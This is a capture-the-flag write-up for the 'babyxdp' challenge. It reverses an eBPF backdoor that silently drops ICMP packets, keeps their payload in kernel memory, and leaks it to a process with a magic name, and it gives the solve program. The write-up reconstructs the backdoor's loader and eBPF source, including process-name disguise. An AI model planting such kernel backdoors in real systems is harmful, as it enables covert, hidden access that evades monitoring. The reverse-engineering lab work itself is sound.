Resources
- https://en.wikipedia.org/wiki/Express_Data_Path - Wikipedia entry for XDP.
- https://docs.kernel.org/bpf/libbpf/libbpf_overview.html - Overview of libbpf for Linux kernel.
- https://bpftool.dev/ - A command-line tool to inspect and manage BPF objects.
- https://github.com/xdp-project/xdp-tutorial/ - XDP programming tutorial Github repository.
- https://docs.kernel.org/trace/tracepoints.html - Linux kernel tracepoints documentation.
Solution
The flag is sent over the network in an ICMP packet, intercepted by an XDP program, and stored in kernel memory. A backdoor allows retrieving it. Compile the following program to a file named 0bd6fcd9, then run chmod +x 0bd6fcd9 && PATH=. 0bd6fcd9 to trigger the backdoor and receive the flag in userspace.
#include <fcntl.h>
#include <unistd.h>
#include <sys/syscall.h>

#define SYS_openat 0x101

int main() {
    char data[256];
    for (int i = 0; i < 256; i++) { data[i] = 0; }
    syscall(SYS_openat, AT_FDCWD, data);  // The backdoor writes the flag into data
    write(1, data, 128);
}
Detailed solution
First let’s extract the archive and find what we are working with.
$ tar xvf babyxdp.tar.xz && cd generated && tree
.
├── buildroot
│ ├── bzImage
│ └── rootfs.ext2
├── docker-compose.yml
├── Dockerfile
├── flag
├── qemu
│ ├── bios-256k.bin
│ ├── efi-virtio.rom
│ ├── kvmvapic.bin
│ ├── linuxboot_dma.bin
│ └── qemu-system-x86_64
└── run.sh
3 directories, 11 files
To understand the challenge setup, we take a look at the Docker files first.
$ cat docker-compose.yml
services:
  baby-xdp:
    build: .
    ports:
      - "4000:4000"
    environment:
      - FLAG=FCSC{ceci est un faux flag}
$ cat Dockerfile
[...]
WORKDIR /app
EXPOSE 4000
USER ctf
CMD ["socat", "tcp-l:4000,reuseaddr,fork", "EXEC:\"/app/run.sh\",pty,stderr"]
The Docker container runs /app/run.sh, which we can interact with by connecting to port 4000. The run.sh script contains only the following command, which starts a full system emulation with QEMU. It runs a Linux kernel image, with the rootfs.ext2 filesystem mounted, and a network device configured with MAC address 02:ca:fe:42:00:01.
The -netdev stream,id=n,addr.type=fd,addr.str=%d option configures file-descriptor-based networking using the "stream" backend. This allows sending network packets to the machine via a file descriptor. The %d placeholder will be replaced at runtime, before the QEMU command is executed.
#!/bin/bash
/app/flag /app/qemu-system-x86_64 \
-m 256m \
-bios /app/bios-256k.bin \
-kernel bzImage \
-snapshot \
-drive file=rootfs.ext2,if=virtio,format=raw \
-append "rootwait root=/dev/vda console=ttyS0 no_timer_check" \
-nodefaults \
-device virtio-net-pci,netdev=n,mac=02:ca:fe:42:00:01 \
-netdev stream,id=n,addr.type=fd,addr.str=%d \
-vga none \
-nographic \
-serial stdio \
-monitor none
Notice that /app/qemu-system-x86_64 is not launched directly; it is wrapped by /app/flag. Before starting the machine, we can first open the flag executable in Ghidra or IDA to understand what it is doing.
undefined8 main(int argc, char **argv) {
__pid_t fd;
int sv;
undefined4 local_10;
int r;
r = socketpair(1,1,0,&sv);
if (r != 0) {
err(1,"socketpair failed");
}
fd = fork();
if (fd == -1) {
err(1,"fork failed");
}
else if (fd != 0) {
fixup_fd(argv + 1,local_10);
execv(argv[1],argv + 1);
err(1,"execv failed");
return 0;
}
interact(sv);
return 0;
}
The program forks into two processes.
- The parent process calls fixup_fd to replace %d with the correct file descriptor ("fix fd for wiring packets to qemu instance"), then runs the command given by its command-line arguments (in this case /app/qemu-system-x86_64 [...]).
- The child process runs the interact function, which calls send_flag in an infinite loop.
void interact(int fd) {
ssize_t n;
undefined1 buffer [1504];
pollfd pollfd;
int r;
do {
while( true ) {
while( true ) {
pollfd.events = 1;
pollfd.revents = 0;
pollfd.fd = fd;
r = poll(&pollfd,1,1000);
if (r != 0) break;
send_flag(fd);
}
if (r != 1) break;
n = read(fd,buffer,1504);
r = (int)n;
}
perror("poll failed");
} while( true );
}
After renaming some variables in the send_flag function, we understand that it simply crafts and sends a network packet containing the flag to the QEMU machine. More precisely:
- The packet is an ICMP packet containing the flag in the data field.
- The ICMP packet is encapsulated in an IPv4 header, specifying source address 198.131.0.1 and destination address 198.131.0.2.
- The IPv4 packet is encapsulated in an Ethernet header, specifying destination address 02:ca:fe:42:00:01, the same MAC address as in the QEMU command.
void send_flag(undefined4 param_1) {
in_addr_t src_addr;
in_addr_t dst_addr;
size_t flag_len;
uint32_t total_len;
iovec iovecs [5];
byte icmp_payload [8];
byte ip_payload [20];
byte eth_payload [14];
char *flag;
uint16_t id_ip;
long n;
dst_addr = inet_addr("198.131.0.2");
src_addr = inet_addr("198.131.0.1");
flag = getenv("FLAG");
if (flag == (char *)0x0) {
flag = "FCSC{ceci est un faux flag}";
}
iovecs[0].iov_base = &total_len;
iovecs[0].iov_len = 4;
iovecs[1].iov_base = eth_payload;
iovecs[1].iov_len = 14;
// Destination MAC address 02:ca:fe:42:00:01
eth_payload[0] = 2;
eth_payload[1] = 0xca;
eth_payload[2] = 0xfe;
eth_payload[3] = 0x42;
eth_payload[4] = 0;
eth_payload[5] = 1;
memset(eth_payload + 6,0,6); // Source MAC address 00:00:00:00:00:00
eth_payload._12_2_ = htons(0x800); // Type: IPV4
iovecs[2].iov_base = ip_payload;
iovecs[2].iov_len = 20;
ip_payload[0] = 0x45; // Version: 4, IHL: 5 (20-byte header)
ip_payload[1] = 0;
flag_len = strlen(flag);
ip_payload._2_2_ = htons((short)flag_len + 0x1c);
id_ip = id_ip.0;
id_ip.0 = id_ip.0 + 1;
ip_payload._4_2_ = htons(id_ip); // Unique identification
ip_payload[6] = 0;
ip_payload[7] = 0;
ip_payload[8] = 1;
ip_payload[9] = 1; // Protocol: ICMP (1)
iovecs[3].iov_base = icmp_payload;
iovecs[3].iov_len = 8;
icmp_payload[0] = 8; // Type: 8 (Echo (ping) request)
icmp_payload[1] = 0;
icmp_payload[4] = 0;
icmp_payload[5] = 0;
icmp_payload[6] = 0;
icmp_payload[7] = 0;
icmp_payload[2] = 0;
icmp_payload[3] = 0;
// ICMP data
iovecs[4].iov_base = flag;
ip_payload._12_4_ = src_addr;
ip_payload._16_4_ = dst_addr;
iovecs[4].iov_len = strlen(flag);
n = iovecs[4].iov_len + 42;
total_len = htonl((uint32_t)n);
do_writev(param_1,iovecs,5,n + iovecs[0].iov_len);
return;
}
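Putting the iovecs together, the frame written to the socketpair has the following layout (a sketch; the struct and its field names are mine, derived from the decompiled code above). The 4-byte length prefix is the framing used by QEMU's stream netdev, and the ICMP payload, i.e. the flag, starts at offset 14 + 20 + 8 = 42 of the Ethernet frame, matching the +42 in the code.
#include <stdint.h>

/* Hypothetical view of one frame sent by send_flag (names are mine). */
struct __attribute__((packed)) flag_frame {
    uint32_t len_be;   /* htonl(14 + 20 + 8 + strlen(flag)): stream netdev length prefix */
    uint8_t  eth[14];  /* Ethernet: dst 02:ca:fe:42:00:01, src 00:00:00:00:00:00, type 0x0800 (IPv4) */
    uint8_t  ip[20];   /* IPv4: protocol 1 (ICMP), 198.131.0.1 -> 198.131.0.2 */
    uint8_t  icmp[8];  /* ICMP: type 8 (echo request), code 0 */
    uint8_t  data[];   /* flag bytes, at offset 42 of the Ethernet frame */
};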
Now that we understand the setup, the goal is to find a way to obtain the flag sent over the network. Let’s connect to the QEMU machine (nc localhost 4000
) and confirm that we have IP 198.131.0.2
on a network interface eth0
with MAC address 02:ca:fe:42:00:01
.
$ ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 02:ca:fe:42:00:01 brd ff:ff:ff:ff:ff:ff
inet 198.131.0.2/29 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::ca:feff:fe42:1/64 scope link
valid_lft forever preferred_lft forever
As explained in the challenge description, trying to run tcpdump to capture the network packets sent to the machine yields no result. But why?
The challenge title hints at XDP, a quick Google search explains that it refers to the technology called “eXpress Data Path”, described as “an eBPF-based high-performance network data path used to send and receive network packets at high rates by bypassing most of the operating system networking stack”.
Basically, XDP is a framework that makes it possible to process a network packet immediately when it is received by the network interface, before going through the usual kernel path. This works by attaching a so-called XDP program to a network interface, which is executed whenever a new packet is received. This program can decide to drop the packet, forward it to the normal network stack or even redirect it to another network interface card.
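To make this concrete, here is roughly what a minimal XDP program looks like in source form (a generic sketch unrelated to the challenge binary, compiled with clang -target bpf and loaded with libbpf): the function receives a struct xdp_md describing the raw packet and returns a verdict.
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

/* Minimal XDP program: let every packet continue to the normal stack. */
SEC("xdp")
int xdp_noop(struct xdp_md *ctx)
{
    /* Returning XDP_DROP here instead would silently discard the packet
     * before tcpdump or the kernel network stack ever sees it. */
    return XDP_PASS;
}

char LICENSE[] SEC("license") = "GPL";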
Since XDP programs are executed in kernelspace and we are not root on the machine, we will have no chance to read the ICMP packet from userspace if it is dropped or does not go through the usual network stack.
Fortunately, looking around inside the QEMU machine, we find a suspicious backdoor executable at the root of the Linux filesystem. It is owned by root, but we can at least read it. To analyze it, we can encode it with the base64 command, copy-paste the output, and decode it back in our own environment.
$ ls -la /backdoor
-rwxr-xr-x 1 root root 14632 Mar 11 16:25 /backdoor
First, the program calls prctl(PR_SET_NAME, "[kthread]"); to rename itself to [kthread] in order to look less suspicious. Then it uses libbpf, a library that takes compiled eBPF programs, prepares them and loads them into the Linux kernel. This is the usual mechanism used to load XDP programs into the kernel. In the following piece of code from the backdoor function:
- bpf_object_skeleton is a structure that contains all the information required to load the program with libbpf.
- bpf_prog_skeleton contains information about the actual eBPF programs to load into the kernel. Two functions are declared, xdp_prog and trace_enter_open_at. Their code is loaded from the PROG variable of the backdoor executable.
- bpf_map_skeleton contains information about a memory mapping that will be used by the eBPF programs, namely backdoor.bss.
bpf_object_skeleton = (bpf_object_skeleton *)calloc(1, 0x48);
if (bpf_object_skeleton == (bpf_object_skeleton *)0x0) {
iVar2 = -0xc;
bpf_object__destroy_skeleton(bpf_object_skeleton);
}
else {
bpf_object_skeleton->sz = 72;
bpf_object_skeleton->name = "backdoor_bpf";
bpf_object_skeleton->obj = (undefined8 *)&bpf->field_0x8;
bpf_object_skeleton->map_cnt = 1;
bpf_object_skeleton->map_skel_sz = 0x18;
bpf_map_skeleton = (bpf_map_skeleton *)calloc(1,0x18);
bpf_object_skeleton->maps = bpf_map_skeleton;
if (bpf_map_skeleton == (bpf_map_skeleton *)0x0) goto LAB_0010137b;
bpf_map_skeleton->map = (void **)&bpf->field_0x10;
bpf_map_skeleton->name = "backdoor.bss";
bpf_map_skeleton->mmaped = &bpf[1].field0_0x0;
bpf_object_skeleton->prog_cnt = 2;
bpf_object_skeleton->prog_skel_sz = 0x18;
bpf_prog_skeleton = (bpf_prog_skeleton *)calloc(2,0x18);
bpf_object_skeleton->progs = bpf_prog_skeleton;
if (bpf_prog_skeleton == (bpf_prog_skeleton *)0x0) goto LAB_0010137b;
bpf->field0_0x0 = bpf_object_skeleton;
bpf_prog_skeleton->prog = (void **)&bpf->field17_0x18;
bpf_prog_skeleton->link = (void **)&bpf->field_0x28;
bpf_prog_skeleton->name = "xdp_prog";
bpf_prog_skeleton[1].prog = (void **)&bpf->field_0x20;
bpf_prog_skeleton[1].name = "trace_enter_open_at";
bpf_prog_skeleton[1].link = (void **)&bpf->field_0x30;
bpf_object_skeleton->data_sz = 1736;
bpf_object_skeleton->data = &PROG;
iVar2 = bpf_object__open_skeleton(bpf_object_skeleton,0);
if (iVar2 == 0) {
iVar2 = bpf_object__load_skeleton(bpf->field0_0x0);
if (iVar2 == 0) {
iVar2 = bpf_object__attach_skeleton(bpf->field0_0x0);
if (iVar2 == 0) {
fd = bpf_program__fd(bpf->field17_0x18);
uVar3 = bpf_xdp_attach(if,fd,2,0); // 2 == XDP_FLAGS_SKB_MODE (generic XDP)
if (uVar3 == 0) {
do {
sleep(1);
} while( true );
}
fprintf(stderr,"failed to attach BPF to iface %s (%d): %d\n",__ifname,(ulong)if,
(ulong)uVar3);
}
else {
fputs("failed to attach BPF\n",stderr);
}
}
else {
fprintf(stderr,"failed to load BPF object: %d\n");
}
destroy_bpf(bpf);
return 1;
}
}
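This decompiled code is essentially what a skeleton generated by bpftool gen skeleton expands to. Written by hand against that generated API, the loader would look roughly like the following (a sketch, not the author's actual source; the header name backdoor.skel.h, the backdoor_bpf__* functions and the "eth0" interface name are assumptions derived from the strings in the decompiled code).
#include <stdio.h>
#include <unistd.h>
#include <net/if.h>
#include <bpf/libbpf.h>
#include "backdoor.skel.h"   /* hypothetical header generated by: bpftool gen skeleton */

int main(void)
{
    struct backdoor_bpf *skel = backdoor_bpf__open();   /* parse the embedded BPF object (PROG) */
    if (!skel)
        return 1;

    if (backdoor_bpf__load(skel) ||                      /* create the .bss map, load both programs */
        backdoor_bpf__attach(skel)) {                    /* auto-attach the tracepoint program */
        backdoor_bpf__destroy(skel);
        return 1;
    }

    /* The XDP program is attached to the interface by hand;
     * flag 2 is XDP_FLAGS_SKB_MODE (generic XDP). */
    int ifindex = if_nametoindex("eth0");
    if (bpf_xdp_attach(ifindex, bpf_program__fd(skel->progs.xdp_prog), 2, NULL)) {
        backdoor_bpf__destroy(skel);
        return 1;
    }

    for (;;)
        sleep(1);
}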
The XDP program is loaded into the kernel using bpf_xdp_attach
. To verify this, we can also run the backdoor
executable as root on a different machine and use the bpftool
utility to inspect the running eBPF objects in the kernel.
$ sudo ./backdoor
$ sudo bpftool prog
[...]
371: xdp name xdp_prog tag dc3a1b7222bc57bd gpl
loaded_at 2025-04-21T02:51:23+0200 uid 0
xlated 264B jited 171B memlock 4096B map_ids 53
pids [kthread](162663)
372: tracepoint name trace_enter_ope tag 45f5bc76bef40ef8 gpl
loaded_at 2025-04-21T02:51:23+0200 uid 0
xlated 248B jited 179B memlock 4096B map_ids 53
pids [kthread](162663)
The first entry is the function xdp_prog, the XDP program, and the second one is the function trace_enter_open_at, which bpftool identifies as a tracepoint program. The next step is to extract PROG and reverse engineer the xdp_prog function to understand what is happening to the ICMP packet.
undefined8 xdp_prog(xdp_md *ctx) {
long res;
byte *data;
byte *data_end;
ulonglong size;
byte *ptr;
byte *ptr2;
void *flag_ptr;
flag_ptr = flag;
_res = 2;
data_end = *(byte **)&ctx->data_end;
data = *(byte **)ctx;
ptr = data + 14;
if ((((ptr <= data_end) && (*(longlong *)(data + 12) == 8)) && (data + 34 <= data_end)) &&
(((ptr + (*(ulonglong *)ptr & 15) * 4 <= data_end && (*(longlong *)(data + 23) == 1)) &&
(ptr2 = ptr + (*(ulonglong *)ptr & 15) * 4 + 8, ptr2 <= data_end)))) {
size = (longlong)data_end - (longlong)ptr2;
if (126 < size) {
size = 127;
}
bpf_probe_read_kernel(flag,(u32)size,ptr2);
*(undefined1 *)((longlong)flag_ptr + 127) = 0;
_res = 1;
}
return _res;
}
By default the function returns 2, the value of XDP_PASS (see https://elixir.bootlin.com/linux/v6.12/source/include/uapi/linux/bpf.h#L6441), which means that the packet should proceed through the usual network stack. If a certain condition is met, it returns 1 instead, the value of XDP_DROP. The condition can be split into two parts:
- *(longlong *)(data + 12) == 8 => Type field of the Ethernet header, 8 means IPv4.
- *(longlong *)(data + 23) == 1 => Protocol field of the IPv4 header, 1 means ICMP.
We conclude that this XDP program will drop any ICMP packet. This is why it was not possible to see them using tcpdump
earlier. However, it will also call bpf_probe_read_kernel(flag, size, ptr2)
. This has the effect of storing the ICMP payload into a flag
variable, located in the .bss
section. Since the program is running in kernelspace, the flag that is sent over the network is stored somewhere in kernel memory and we have no chance of recovering it for now.
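For reference, the source of xdp_prog before compilation plausibly looked like the following (a reconstruction from the decompiled output; the variable names, exact types and header-parsing details are assumptions):
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

/* Shared buffer, placed in the backdoor.bss map and also read by the
 * tracepoint program analyzed below. */
char flag[128];

SEC("xdp")
int xdp_prog(struct xdp_md *ctx)
{
    unsigned char *data     = (unsigned char *)(long)ctx->data;
    unsigned char *data_end = (unsigned char *)(long)ctx->data_end;

    /* 14-byte Ethernet header followed by at least a 20-byte IPv4 header */
    if (data + 34 > data_end)
        return XDP_PASS;
    if (data[12] != 0x08 || data[13] != 0x00)   /* EtherType 0x0800: IPv4 */
        return XDP_PASS;
    if (data[23] != 1)                          /* IPv4 protocol 1: ICMP */
        return XDP_PASS;

    /* Skip the variable-length IPv4 header (IHL * 4) and the 8-byte ICMP header */
    unsigned long ihl = data[14] & 0x0f;
    unsigned char *payload = data + 14 + ihl * 4 + 8;
    if (payload > data_end)
        return XDP_PASS;

    unsigned long size = data_end - payload;
    if (size > 127)
        size = 127;

    /* Stash the ICMP payload (the flag) in kernel memory, then hide the packet */
    bpf_probe_read_kernel(flag, size, payload);
    flag[127] = 0;
    return XDP_DROP;
}

char LICENSE[] SEC("license") = "GPL";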
Then let’s analyze the other loaded eBPF object, the trace_enter_open_at
tracepoint. It is interesting because it will be called in kernelspace whenever an openat
syscall is invoked from userspace.
int trace_enter_open_at(syscalls_enter_open_arg *ctx) {
void *dst;
byte buf [16];
dst = *(void **)&ctx->filename_ptr;
bpf_get_current_comm((char *)buf,16);
/* 0bd6fcd9 */
if (buf[0] == '0' && buf[1] == 'b' && buf[2] == 'd' && buf[3] == '6' &&
buf[4] == 'f' && buf[5] == 'c' && buf[6] == 'd' && buf[7] == '9') {
bpf_probe_write_user(dst, flag, 128);
}
return 0;
}
This is exactly what we are looking for. This function looks up the name of the process that invoked the syscall, and if it matches the string "0bd6fcd9", it copies the content of the flag variable from kernel memory to the userspace memory pointed to by the filename_ptr argument of the openat syscall.
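Its source probably resembled the following (again a reconstruction; the tracepoint context layout and field names are assumptions, and flag is the same global buffer that xdp_prog fills, since both programs live in the same BPF object and share the backdoor.bss map):
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

char flag[128];   /* same buffer as in xdp_prog (backdoor.bss map) */

/* Simplified, assumed layout of the syscalls:sys_enter_openat tracepoint context. */
struct sys_enter_openat_ctx {
    unsigned long long common;   /* common tracepoint fields */
    long syscall_nr;
    long dfd;
    const char *filename;        /* userspace pointer passed to openat() */
    long flags;
    long mode;
};

SEC("tracepoint/syscalls/sys_enter_openat")
int trace_enter_open_at(struct sys_enter_openat_ctx *ctx)
{
    char comm[16];
    const char magic[] = "0bd6fcd9";

    bpf_get_current_comm(comm, sizeof(comm));

    /* Only act when the calling process is named exactly "0bd6fcd9" */
    for (int i = 0; i < 8; i++)
        if (comm[i] != magic[i])
            return 0;

    /* Leak the captured flag into the caller's openat() path buffer */
    bpf_probe_write_user((void *)ctx->filename, flag, 128);
    return 0;
}

char LICENSE[] SEC("license") = "GPL";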
We have now found all the pieces of the puzzle to obtain the flag. Simply run an executable called “0bd6fcd9” and invoke an openat
syscall to receive the flag from the kernel. The following C program can be used to do so.
#include <fcntl.h>
#include <unistd.h>
#include <sys/syscall.h>

#define SYS_openat 0x101

int main() {
    char data[256];
    for (int i = 0; i < 256; i++) { data[i] = 0; }
    syscall(SYS_openat, AT_FDCWD, data);  // The flag will be written in the data buffer
    write(1, data, 128);
}
To get a very lightweight executable and avoid issues when copying it as base64 to the QEMU machine, you can use an alternative libc such as diet libc, or even write the program directly in assembly. If using diet libc, make sure to add the -lcompat flag to avoid linking issues.
$ diet -v gcc solve.c -o 0bd6fcd9
gcc -nostdlib -static -L/opt/diet/lib-x86_64 /opt/diet/lib-x86_64/start.o solve.c -o 0bd6fcd9 -isystem /opt/diet/include -D__dietlibc__ /opt/diet/lib-x86_64/libc.a -lgcc /opt/diet/lib-x86_64/crtend.o
/usr/bin/ld: /tmp/cc9Hnvhf.o: in function `main':
solve.c:(.text+0x63): undefined reference to `syscall'
collect2: error: ld returned 1 exit status
$ gcc -nostdlib -static -L/opt/diet/lib-x86_64 /opt/diet/lib-x86_64/start.o -Wall solve.c -o 0bd6fcd9 -isystem /opt/diet/include -D__dietlibc__ /opt/diet/lib-x86_64/libc.a -lgcc /opt/diet/lib-x86_64/crtend.o -lcompat
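Alternatively, the libc dependency can be avoided entirely with raw syscalls, in the spirit of writing the program in assembly. Here is a sketch for x86_64 Linux only (the file name solve_raw.c is mine; build with gcc -nostdlib -static -fno-stack-protector solve_raw.c -o 0bd6fcd9):
/* Raw-syscall variant, no libc required (x86_64 only). */
static long sys3(long nr, long a1, long a2, long a3)
{
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3)
                      : "rcx", "r11", "memory");
    return ret;
}

void _start(void)
{
    char data[256];
    for (int i = 0; i < 256; i++)
        data[i] = 0;

    sys3(257, -100, (long)data, 0);  /* openat(AT_FDCWD, data, O_RDONLY): triggers the backdoor */
    sys3(1, 1, (long)data, 128);     /* write(1, data, 128): print the flag */
    sys3(60, 0, 0, 0);               /* exit(0) */
}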
Finally, we run the program in the QEMU machine with chmod +x 0bd6fcd9 && PATH=. 0bd6fcd9 to ensure that our process is named 0bd6fcd9 and not ./0bd6fcd9. An alternative method is to use the prctl(PR_SET_NAME) syscall to rename the process at runtime, as the backdoor executable did earlier to conceal itself; a minimal sketch follows below.
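For completeness, the prctl variant could look like this (a sketch; it renames the running process so the comm check in the tracepoint matches regardless of how the binary was invoked):
#include <fcntl.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>

int main(void)
{
    char data[256] = {0};

    prctl(PR_SET_NAME, "0bd6fcd9");          /* rename the process, like the backdoor does */
    syscall(SYS_openat, AT_FDCWD, data, 0);  /* the backdoor writes the flag into data */
    write(1, data, 128);
    return 0;
}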
$ chmod +x 0bd6fcd9 && PATH=. 0bd6fcd9
FCSC{8c69e56ea0b77707419072935d5878a61eaea9f576dfe456b76eb1159b8ac217}